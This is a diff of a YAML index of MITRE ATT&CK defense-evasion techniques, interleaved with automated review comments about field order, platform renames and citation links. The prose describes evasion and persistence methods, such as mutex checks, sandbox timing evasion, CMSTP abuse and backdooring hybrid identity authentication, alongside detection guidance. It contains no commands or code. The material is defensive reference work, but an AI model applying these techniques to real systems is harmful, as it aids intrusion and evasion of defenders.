@@ -4134,9 +4219,76 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1620
atomic_tests: []
+ T1480.002:
+ technique:
+ modified: '2024-10-28T16:22:25.431Z'
+ name: Mutual Exclusion
+ description: |-
+ Adversaries may constrain execution or actions based on the presence of a mutex associated with malware. A mutex is a locking mechanism used to synchronize access to a resource. Only one thread or process can acquire a mutex at a given time.(Citation: Microsoft Mutexes)
+
+ While local mutexes only exist within a given process, allowing multiple threads to synchronize access to a resource, system mutexes can be used to synchronize the activities of multiple processes.(Citation: Microsoft Mutexes) By creating a unique system mutex associated with a particular malware, adversaries can verify whether or not a system has already been compromised.(Citation: Sans Mutexes 2012)
+
+ In Linux environments, malware may instead attempt to acquire a lock on a mutex file. If the malware is able to acquire the lock, it continues to execute; if it fails, it exits to avoid creating a second instance of itself.(Citation: Intezer RedXOR 2021)(Citation: Deep Instinct BPFDoor 2023)
+
+ Mutex names may be hard-coded or dynamically generated using a predictable algorithm.(Citation: ICS Mutexes 2015)
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ x_mitre_contributors:
+ - Manikantan Srinivasan, NEC Corporation India
+ - Pooja Natarajan, NEC Corporation India
+ - Nagahama Hiroki – NEC Corporation Japan
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
+ - Linux
+ - macOS
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Process: OS API Execution'
+ - 'File: File Creation'
+ type: attack-pattern
+ id: attack-pattern--49fca0d2-685d-41eb-8bd4-05451cc3a742
+ created: '2024-09-19T14:00:03.401Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1480/002
+ external_id: T1480.002
+ - source_name: Intezer RedXOR 2021
+ description: Joakim Kennedy and Avigayil Mechtinger. (2021, March 10). New
+ Linux Backdoor RedXOR Likely Operated by Chinese Nation-State Actor. Retrieved
+ September 19, 2024.
+ url: https://intezer.com/blog/malware-analysis/new-linux-backdoor-redxor-likely-operated-by-chinese-nation-state-actor/
+ - source_name: Sans Mutexes 2012
+ description: Lenny Zeltser. (2012, July 24). Looking at Mutex Objects for
+ Malware Discovery & Indicators of Compromise. Retrieved September 19, 2024.
+ url: https://www.sans.org/blog/looking-at-mutex-objects-for-malware-discovery-indicators-of-compromise/
+ - source_name: ICS Mutexes 2015
+ description: Lenny Zeltser. (2015, March 9). How Malware Generates Mutex Names
+ to Evade Detection. Retrieved September 19, 2024.
+ url: https://isc.sans.edu/diary/How+Malware+Generates+Mutex+Names+to+Evade+Detection/19429/
+ - source_name: Microsoft Mutexes
+ description: Microsoft. (2022, March 11). Mutexes. Retrieved September 19,
+ 2024.
+ url: https://learn.microsoft.com/en-us/dotnet/standard/threading/mutexes
+ - source_name: Deep Instinct BPFDoor 2023
+ description: Shaul Vilkomir-Preisman and Eliran Nissan. (2023, May 10). BPFDoor
+ Malware Evolves – Stealthy Sniffing Backdoor Ups Its Game. Retrieved September
+ 19, 2024.
+ url: https://www.deepinstinct.com/blog/bpfdoor-malware-evolves-stealthy-sniffing-backdoor-ups-its-game
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
T1564.011:
technique:
modified: '2023-11-06T20:14:51.609Z'
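Review bot: the newly added T1480.002 entry ends with `atomic_tests: []` and has no `identifier: T1480.002` line, while T1620 directly above it closes with `identifier: T1620`; confirm whether `identifier` is required for every technique or only for those with tests, and add it if the former. Also in this block, `x_mitre_detection: ''` is empty and the third contributor line uses an en dash (`Nagahama Hiroki – NEC Corporation Japan`) where the two above use a comma; both come from upstream and are best fixed there.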
@@ -4200,57 +4352,10 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1497.003:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Jorge Orchilles, SCYTHE
- - Ruben Dodge, @shotgunner101
- - Jeff Felling, Red Canary
- - Deloitte Threat Library Team
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--4bed873f-0b7d-41d4-b93a-b6905d1f90b0
- type: attack-pattern
- created: '2020-03-06T21:11:11.225Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1497.003
- url: https://attack.mitre.org/techniques/T1497/003
- - source_name: Deloitte Environment Awareness
- url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc
- description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
- May 18, 2021.
- - source_name: Revil Independence Day
- url: https://news.sophos.com/en-us/2021/07/04/independence-day-revil-uses-supply-chain-exploit-to-attack-hundreds-of-businesses/
- description: 'Loman, M. et al. (2021, July 4). Independence Day: REvil uses
- supply chain exploit to attack hundreds of businesses. Retrieved September
- 30, 2021.'
- - source_name: Netskope Nitol
- url: https://www.netskope.com/blog/nitol-botnet-makes-resurgence-evasive-sandbox-analysis-technique
- description: Malik, A. (2016, October 14). Nitol Botnet makes a resurgence
- with evasive sandbox analysis technique. Retrieved September 30, 2021.
- - source_name: Joe Sec Nymaim
- url: https://www.joesecurity.org/blog/3660886847485093803
- description: Joe Security. (2016, April 21). Nymaim - evading Sandboxes with
- API hammering. Retrieved September 30, 2021.
- - source_name: Joe Sec Trickbot
- url: https://www.joesecurity.org/blog/498839998833561473
- description: Joe Security. (2020, July 13). TrickBot's new API-Hammering explained.
- Retrieved September 30, 2021.
- - source_name: ISACA Malware Tricks
- url: https://www.isaca.org/resources/isaca-journal/issues/2017/volume-6/evasive-malware-tricks-how-malware-evades-detection-by-sandboxes
- description: 'Kolbitsch, C. (2017, November 1). Evasive Malware Tricks: How
- Malware Evades Detection by Sandboxes. Retrieved March 30, 2021.'
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-09-12T15:50:18.048Z'
name: Time Based Evasion
description: |-
Adversaries may employ various time-based methods to detect and avoid virtualization and analysis environments. This may include enumerating time-based properties, such as uptime or the system clock, as well as the use of timers or other triggers to avoid a virtual machine environment (VME) or sandbox, specifically those that are automated or only operate for a limited amount of time.
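Review bot: almost all of the removed lines in this hunk (`x_mitre_platforms`, `x_mitre_domains`, `x_mitre_contributors`, `external_references`, `id`, `type`, `created`) are re-emitted unchanged in the hunks that follow, just in a different key order, so the only content change visible here is the `modified` date. Emitting keys in a stable order from the generator would keep future diffs limited to real changes and make regressions like the `spec_version` drop easier to spot.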
@@ -4265,6 +4370,12 @@ defense-evasion:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: discovery
+ x_mitre_contributors:
+ - Jorge Orchilles, SCYTHE
+ - Ruben Dodge, @shotgunner101
+ - Jeff Felling, Red Canary
+ - Deloitte Threat Library Team
+ x_mitre_deprecated: false
x_mitre_detection: 'Time-based evasion will likely occur in the first steps
of an operation but may also occur throughout as an adversary learns the environment.
Data and events should not be viewed in isolation, but as part of a chain
@@ -4274,9 +4385,14 @@ defense-evasion:
implementation and monitoring required. Monitoring for suspicious processes
being spawned that gather a variety of system information or perform other
forms of Discovery, especially in a short period of time, may aid in detection. '
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
x_mitre_version: '1.2'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Process: OS API Execution'
- 'Process: Process Creation'
@@ -4286,13 +4402,49 @@ defense-evasion:
- Signature-based detection
- Static File Analysis
- Anti-virus
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--4bed873f-0b7d-41d4-b93a-b6905d1f90b0
+ created: '2020-03-06T21:11:11.225Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1497/003
+ external_id: T1497.003
+ - source_name: Joe Sec Nymaim
+ description: Joe Security. (2016, April 21). Nymaim - evading Sandboxes with
+ API hammering. Retrieved September 30, 2021.
+ url: https://www.joesecurity.org/blog/3660886847485093803
+ - source_name: Joe Sec Trickbot
+ description: Joe Security. (2020, July 13). TrickBot's new API-Hammering explained.
+ Retrieved September 30, 2021.
+ url: https://www.joesecurity.org/blog/498839998833561473
+ - source_name: ISACA Malware Tricks
+ description: 'Kolbitsch, C. (2017, November 1). Evasive Malware Tricks: How
+ Malware Evades Detection by Sandboxes. Retrieved March 30, 2021.'
+ url: https://www.isaca.org/resources/isaca-journal/issues/2017/volume-6/evasive-malware-tricks-how-malware-evades-detection-by-sandboxes
+ - source_name: Revil Independence Day
+ description: 'Loman, M. et al. (2021, July 4). Independence Day: REvil uses
+ supply chain exploit to attack hundreds of businesses. Retrieved September
+ 30, 2021.'
+ url: https://news.sophos.com/en-us/2021/07/04/independence-day-revil-uses-supply-chain-exploit-to-attack-hundreds-of-businesses/
+ - source_name: Netskope Nitol
+ description: Malik, A. (2016, October 14). Nitol Botnet makes a resurgence
+ with evasive sandbox analysis technique. Retrieved September 30, 2021.
+ url: https://www.netskope.com/blog/nitol-botnet-makes-resurgence-evasive-sandbox-analysis-technique
+ - source_name: Deloitte Environment Awareness
+ description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
+ September 13, 2024.
+ url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1497.003
atomic_tests: []
T1218.003:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-09-12T19:35:43.077Z'
name: 'Signed Binary Proxy Execution: CMSTP'
description: |-
Adversaries may abuse CMSTP to proxy execution of malicious code. The Microsoft Connection Manager Profile Installer (CMSTP.exe) is a command-line program used to install Connection Manager service profiles. (Citation: Microsoft Connection Manager Oct 2009) CMSTP.exe accepts an installation information file (INF) as a parameter and installs a service profile leveraged for remote access connections.
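Review bot: the `Deloitte Environment Awareness` URL gains an `/edit` suffix that the previous link did not have, and `/edit` is the editor form of a Google Drive link rather than the share-for-viewing form; confirm it resolves for anonymous readers before relying on the refreshed "Retrieved September 13, 2024" date. In the same hunk T1497.003 jumps from `x_mitre_attack_spec_version: 2.1.0` to `3.2.0` while its `x_mitre_version` stays `1.2`, which is fine if only the spec changed but worth a glance.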
@@ -4338,8 +4490,8 @@ defense-evasion:
external_id: T1218.003
- source_name: Twitter CMSTP Usage Jan 2018
description: Carr, N. (2018, January 31). Here is some early bad cmstp.exe...
- Retrieved April 11, 2018.
- url: https://twitter.com/ItsReallyNick/status/958789644165894146
+ Retrieved September 12, 2024.
+ url: https://x.com/ItsReallyNick/status/958789644165894146
- source_name: Microsoft Connection Manager Oct 2009
description: Microsoft. (2009, October 8). How Connection Manager Works. Retrieved
April 11, 2018.
@@ -4358,13 +4510,12 @@ defense-evasion:
url: http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/
- source_name: Twitter CMSTP Jan 2018
description: Tyrer, N. (2018, January 30). CMSTP.exe - remote .sct execution
- applocker bypass. Retrieved April 11, 2018.
- url: https://twitter.com/NickTyrer/status/958450014111633408
+ applocker bypass. Retrieved September 12, 2024.
+ url: https://x.com/NickTyrer/status/958450014111633408
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1218.003
atomic_tests: []
T1562.002:
@@ -4479,7 +4630,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1562.002
atomic_tests: []
T1218.002:
@@ -4520,7 +4670,7 @@ defense-evasion:
url: https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf
description: 'Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE
HIDDEN PART OF THE STORY. Retrieved July 16, 2020.'
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-11T19:01:55.821Z'
name: 'Signed Binary Proxy Execution: Control Panel'
description: |-
Adversaries may abuse control.exe to proxy execution of malicious payloads. The Windows Control Panel process binary (control.exe) handles execution of Control Panel items, which are utilities that allow users to view and adjust computer settings.
@@ -4559,8 +4709,6 @@ defense-evasion:
- User
- Administrator
- SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1218.002
atomic_tests: []
T1599.001:
@@ -4583,7 +4731,7 @@ defense-evasion:
url: https://tools.ietf.org/html/rfc1918
description: IETF Network Working Group. (1996, February). Address Allocation
for Private Internets. Retrieved October 20, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-10-21T01:45:58.951Z'
name: Network Address Translation Traversal
description: "Adversaries may bridge network boundaries by modifying a network
device’s Network Address Translation (NAT) configuration. Malicious modifications
@@ -4622,12 +4770,10 @@ defense-evasion:
- 'Network Traffic: Network Traffic Content'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1550:
technique:
- modified: '2024-04-12T21:18:23.798Z'
+ modified: '2024-10-15T16:09:19.001Z'
name: Use Alternate Authentication Material
description: "Adversaries may use alternate authentication material, such as
password hashes, Kerberos tickets, and application access tokens, in order
@@ -4654,6 +4800,7 @@ defense-evasion:
phase_name: lateral-movement
x_mitre_contributors:
- Blake Strom, Microsoft Threat Intelligence
+ - Pawel Partyka, Microsoft Threat Intelligence
x_mitre_deprecated: false
x_mitre_detection: 'Configure robust, consistent account activity audit policies
across the enterprise and with externally accessible services.(Citation: TechNet
@@ -4671,12 +4818,12 @@ defense-evasion:
x_mitre_is_subtechnique: false
x_mitre_platforms:
- Windows
- - Office 365
- SaaS
- - Google Workspace
- IaaS
- Containers
- x_mitre_version: '1.3'
+ - Identity Provider
+ - Office Suite
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Logon Session: Logon Session Creation'
@@ -4702,18 +4849,17 @@ defense-evasion:
description: NIST. (n.d.). Authentication. Retrieved January 30, 2020.
url: https://csrc.nist.gov/glossary/term/authentication
- source_name: NIST MFA
- description: NIST. (n.d.). Multi-Factor Authentication (MFA). Retrieved January
- 30, 2020.
- url: https://csrc.nist.gov/glossary/term/Multi_Factor-Authentication
+ description: NIST. (n.d.). Multi-Factor Authentication (MFA). Retrieved September
+ 25, 2024.
+ url: https://csrc.nist.gov/glossary/term/multi_factor_authentication
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1562.004:
technique:
- modified: '2024-03-28T00:01:08.337Z'
+ modified: '2024-09-12T19:37:57.867Z'
name: 'Impair Defenses: Disable or Modify System Firewall'
description: |-
Adversaries may disable or modify system firewalls in order to bypass controls limiting network usage. Changes could be disabling the entire mechanism as well as adding, deleting, or modifying particular rules. This can be done numerous ways depending on the operating system, including via command-line, editing Windows Registry keys, and Windows Control Panel.
@@ -4758,13 +4904,12 @@ defense-evasion:
url: https://www.huntress.com/blog/blackcat-ransomware-affiliate-ttps
- source_name: change_rdp_port_conti
description: 'The DFIR Report. (2022, March 1). "Change RDP port" #ContiLeaks.
- Retrieved March 1, 2022.'
- url: https://twitter.com/TheDFIRReport/status/1498657772254240768
+ Retrieved September 12, 2024.'
+ url: https://x.com/TheDFIRReport/status/1498657772254240768
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1562.004
atomic_tests: []
T1553.003:
@@ -4836,7 +4981,7 @@ defense-evasion:
* **Note:** The above hijacks are also possible without modifying the Registry via [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001).
Hijacking SIP or trust provider components can also enable persistent code execution, since these malicious components may be invoked by any application that performs code signing or signature validation. (Citation: SpectorOps Subverting Trust Sept 2017)
- modified: '2022-05-24T14:00:00.188Z'
+ modified: '2022-05-05T04:58:58.214Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Subvert Trust Controls: SIP and Trust Provider Hijacking'
x_mitre_detection: |-
@@ -4869,35 +5014,34 @@ defense-evasion:
- Application Control
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1553.003
atomic_tests: []
T1556.007:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Hybrid Identity
description: "Adversaries may patch, modify, or otherwise backdoor cloud authentication
processes that are tied to on-premises user identities in order to bypass
typical authentication mechanisms, access credentials, and enable persistent
access to accounts. \n\nMany organizations maintain hybrid user and device
identities that are shared between on-premises and cloud-based environments.
- These can be maintained in a number of ways. For example, Azure AD includes
- three options for synchronizing identities between Active Directory and Azure
- AD(Citation: Azure AD Hybrid Identity):\n\n* Password Hash Synchronization
+ These can be maintained in a number of ways. For example, Microsoft Entra
+ ID includes three options for synchronizing identities between Active Directory
+ and Entra ID(Citation: Azure AD Hybrid Identity):\n\n* Password Hash Synchronization
(PHS), in which a privileged on-premises account synchronizes user password
- hashes between Active Directory and Azure AD, allowing authentication to Azure
- AD to take place entirely in the cloud \n* Pass Through Authentication (PTA),
- in which Azure AD authentication attempts are forwarded to an on-premises
+ hashes between Active Directory and Entra ID, allowing authentication to Entra
+ ID to take place entirely in the cloud \n* Pass Through Authentication (PTA),
+ in which Entra ID authentication attempts are forwarded to an on-premises
PTA agent, which validates the credentials against Active Directory \n* Active
Directory Federation Services (AD FS), in which a trust relationship is established
- between Active Directory and Azure AD \n\nAD FS can also be used with other
+ between Active Directory and Entra ID \n\nAD FS can also be used with other
SaaS and cloud platforms such as AWS and GCP, which will hand off the authentication
process to AD FS and receive a token containing the hybrid users’ identity
and privileges. \n\nBy modifying authentication processes tied to hybrid identities,
an adversary may be able to establish persistent privileged access to cloud
resources. For example, adversaries who compromise an on-premises server running
a PTA agent may inject a malicious DLL into the `AzureADConnectAuthenticationAgentService`
- process that authorizes all attempts to authenticate to Azure AD, as well
+ process that authorizes all attempts to authenticate to Entra ID, as well
as records user credentials.(Citation: Azure AD Connect for Read Teamers)(Citation:
AADInternals Azure AD On-Prem to Cloud) In environments using AD FS, an adversary
may edit the `Microsoft.IdentityServer.Servicehost` configuration file to
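Review bot: the Azure AD to Entra ID rename is applied to the prose only. The citation keys `(Citation: Azure AD Hybrid Identity)`, `(Citation: Azure AD Connect for Read Teamers)` and `(Citation: AADInternals Azure AD On-Prem to Cloud)` and the literal service name `AzureADConnectAuthenticationAgentService` are left untouched, which is correct: the keys must match their `source_name` entries and the service name is a real Windows service name. "Read Teamers" in the second key reads like a typo for "Red Teamers", but it should only be changed together with the matching `source_name`, and at the source the `x_mitre_*` fields are imported from, not by hand in this file.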
@@ -4905,9 +5049,9 @@ defense-evasion:
any set of claims, thereby bypassing multi-factor authentication and defined
AD FS policies.(Citation: MagicWeb)\n\nIn some cases, adversaries may be able
to modify the hybrid identity authentication process from the cloud. For example,
- adversaries who compromise a Global Administrator account in an Azure AD tenant
+ adversaries who compromise a Global Administrator account in an Entra ID tenant
may be able to register a new PTA agent via the web console, similarly allowing
- them to harvest credentials and log into the Azure AD environment as any user.(Citation:
+ them to harvest credentials and log into the Entra ID environment as any user.(Citation:
Mandiant Azure AD Backdoors)"
kill_chain_phases:
- kill_chain_name: mitre-attack
@@ -4916,21 +5060,22 @@ defense-evasion:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_contributors:
+ - Praetorian
+ x_mitre_deprecated: false
x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- SaaS
- - Google Workspace
- - Office 365
- IaaS
- x_mitre_is_subtechnique: true
- x_mitre_deprecated: false
- x_mitre_domains:
- - enterprise-attack
- x_mitre_version: '1.0'
- x_mitre_contributors:
- - Praetorian
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'File: File Modification'
- 'Module: Module Load'
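Review bot: the platform list drops `Azure AD`, `Google Workspace` and `Office 365` and adds `Office Suite` and `Identity Provider`, with `x_mitre_version` bumped from 1.0 to 1.1. Any consumer that filters techniques by the old platform strings will silently lose T1556.007 after this change; check the per-platform index generation for hard-coded `Azure AD` / `Office 365` / `Google Workspace` values, because the same rename is applied to T1078.001, T1548 and T1548.005 below. `x_mitre_attack_spec_version: 3.2.0` and `x_mitre_modified_by_ref` are added in this hunk while the old `2.1.0` copies are removed further down; the net result is one copy of each, so this is a key reorder rather than a duplicate, but it is worth a glance in the applied file.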
@@ -4970,9 +5115,6 @@ defense-evasion:
url: https://www.mandiant.com/resources/detecting-microsoft-365-azure-active-directory-backdoors
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 2.1.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1218.015:
technique:
@@ -5035,7 +5177,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1562.012:
technique:
@@ -5095,7 +5236,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1562.012
atomic_tests: []
T1207:
@@ -5136,7 +5276,7 @@ defense-evasion:
description: Lucand,G. (2018, February 18). Detect DCShadow, impossible?.
Retrieved March 30, 2018.
source_name: ADDSecurity DCShadow Feb 2018
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-08T21:20:04.850Z'
name: Rogue Domain Controller
description: |-
Adversaries may register a rogue Domain Controller to enable manipulation of Active Directory data. DCShadow may be used to create a rogue Domain Controller (DC). DCShadow is a method of manipulating Active Directory (AD) data, including objects and schemas, by registering (or reusing an inactive registration) and simulating the behavior of a DC. (Citation: DCShadow Blog) Once registered, a rogue DC may be able to inject and replicate changes into AD infrastructure for any domain object, including credentials and keys.
@@ -5167,8 +5307,6 @@ defense-evasion:
x_mitre_permissions_required:
- Administrator
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1207
atomic_tests: []
T1553.006:
@@ -5258,7 +5396,7 @@ defense-evasion:
Escalation](https://attack.mitre.org/techniques/T1068) using a signed, but
vulnerable driver.(Citation: Unit42 AcidBox June 2020)(Citation: GitHub Turla
Driver Loader)"
- modified: '2022-05-24T14:00:00.188Z'
+ modified: '2022-05-05T05:00:03.480Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Subvert Trust Controls: Code Signing Policy Modification'
x_mitre_detection: 'Monitor processes and command-line arguments for actions
@@ -5282,12 +5420,11 @@ defense-evasion:
- Application Control
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1553.006
atomic_tests: []
T1610:
technique:
- modified: '2024-04-11T21:24:42.680Z'
+ modified: '2024-10-15T15:06:17.124Z'
name: Deploy a container
description: |-
Adversaries may deploy a container into an environment to facilitate execution or evade defenses. In some cases, adversaries may deploy a new container to execute processes associated with a particular image or deployment, such as processes that execute or download malware. In others, an adversary may deploy a new container configured without network rules, user limitations, etc. to bypass existing defenses within the environment. In Kubernetes environments, an adversary may attempt to deploy a privileged or vulnerable container into a specific node in order to [Escape to Host](https://attack.mitre.org/techniques/T1611) and access other containers running on the node. (Citation: AppSecco Kubernetes Namespace Breakout 2020)
@@ -5366,7 +5503,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1610
atomic_tests: []
T1112:
@@ -5451,12 +5587,11 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1112
atomic_tests: []
T1574.008:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-09-12T15:25:57.059Z'
name: 'Hijack Execution Flow: Path Interception by Search Order Hijacking'
description: |-
Adversaries may execute their own malicious payloads by hijacking the search order used to load other programs. Because some programs do not call other programs using the full path, adversaries may place their own file in the directory where the calling program is located, causing the operating system to launch their malicious software at the request of the calling program.
@@ -5475,6 +5610,7 @@ defense-evasion:
phase_name: defense-evasion
x_mitre_contributors:
- Stefan Kanthak
+ x_mitre_deprecated: false
x_mitre_detection: |
Monitor file creation for files named after partial directories and in locations that may be searched for common processes through the environment variable, or otherwise should not be user writable. Monitor the executing process for process executable paths that are named for partial directories. Monitor file creation for programs that are named after Windows system programs or programs commonly executed without a path (such as "findstr," "net," and "python"). If this activity occurs outside of known administration activity, upgrades, installations, or patches, then it may be suspicious.
@@ -5482,7 +5618,6 @@ defense-evasion:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.0'
@@ -5502,29 +5637,31 @@ defense-evasion:
id: attack-pattern--58af3705-8740-4c68-9329-ec015a7013c2
created: '2020-03-13T17:48:58.999Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1574/008
external_id: T1574.008
+ - source_name: Microsoft Environment Property
+ description: Microsoft. (2011, October 24). Environment Property. Retrieved
+ July 27, 2016.
+ url: https://docs.microsoft.com/en-us/previous-versions//fd7hxfdd(v=vs.85)?redirectedfrom=MSDN
- source_name: Microsoft CreateProcess
- description: Microsoft. (n.d.). CreateProcess function. Retrieved December
- 5, 2014.
- url: http://msdn.microsoft.com/en-us/library/ms682425
+ description: Microsoft. (n.d.). CreateProcess function. Retrieved September
+ 12, 2024.
+ url: https://learn.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createprocessa
+ - source_name: Microsoft WinExec
+ description: Microsoft. (n.d.). WinExec function. Retrieved September 12,
+ 2024.
+ url: https://learn.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-winexec
- source_name: Windows NT Command Shell
description: Tim Hill. (2014, February 2). The Windows NT Command Shell. Retrieved
December 5, 2014.
url: https://docs.microsoft.com/en-us/previous-versions//cc723564(v=technet.10)?redirectedfrom=MSDN#XSLTsection127121120120
- - source_name: Microsoft WinExec
- description: Microsoft. (n.d.). WinExec function. Retrieved December 5, 2014.
- url: http://msdn.microsoft.com/en-us/library/ms687393
- - source_name: Microsoft Environment Property
- description: Microsoft. (2011, October 24). Environment Property. Retrieved
- July 27, 2016.
- url: https://docs.microsoft.com/en-us/previous-versions//fd7hxfdd(v=vs.85)?redirectedfrom=MSDN
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1574.008
atomic_tests: []
T1535:
